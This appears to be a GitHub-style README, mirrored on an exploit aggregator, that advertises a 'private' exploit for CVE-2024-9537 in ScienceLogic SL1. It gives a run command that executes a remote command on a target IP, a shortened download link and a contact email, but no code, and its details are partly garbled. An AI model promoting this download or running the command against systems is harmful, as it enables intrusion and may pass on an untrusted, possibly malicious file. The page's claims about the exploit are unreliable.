来源

关联漏洞

描述

Authentication Bypass Using an Alternate Path or Channel

介绍

# CVE-2024-9537-Inclusion of Functionality from Untrusted Control Sphere
# Overview
ScienceLogic SL1 (formerly EM7) is affected by an unspecified vulnerability involving an unspecified third-party component packaged with SL1.
# Exploit
## [**Download here**](https://bit.ly/40scV3G) 
## Details 
+ **CVE ID**: [CVE-2024-9537](https://nvd.nist.gov/vuln/detail/CVE-2024-9537)
+ **Published**: 10/18/2024
+ **Impact**: Unconfidentiality
+ **Exploit**: Availability: Not public, only private.
+ **CVSS**: 9.8


## Vulnerability Description
This vulnerability has a critical severity with a CVSS v3.1 base score of 9.8 and a CVSS v4.0 base score of 9.3. It can be exploited over the network without requiring user interaction or privileges. The vulnerability has high impact on confidentiality, integrity, and availability of the affected systems. Given the network attack vector and low attack complexity, this vulnerability could potentially lead to unauthorized access, data breaches, and system compromise. The vulnerability is actively being exploited in the wild and was added to the CISA Known Exploited Vulnerability list.
## Affected versions 
SL1 versions 12.1.3+, 12.2.3+, and 12.3+. Remediations have been made available for all SL1 versions back to version lines 10.1.x, 10.2.x, 11.1.x, 11.2.x, and 11.3.x.
## Running
To run exploit you need Python 3.9. Execute:
```
python CVE-2024-9537.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
+ **For inquiries, please contact: hatvixprime@outlook.com**
## [**Download here**](https://bit.ly/40scV3G) (Only 4 hands)

![image](https://github.com/user-attachments/assets/6887fbb1-f099-4045-a139-aa687895d57f)
![image](https://github.com/user-attachments/assets/1a37cb12-0a1f-488b-80c6-c539d25afcee)

文件快照

 [4.0K]  /data/pocs/4accfcf6e5b1e402cd2949218331ca0f090f3322
└── [1.7K]  README.md

0 directories, 1 file

备注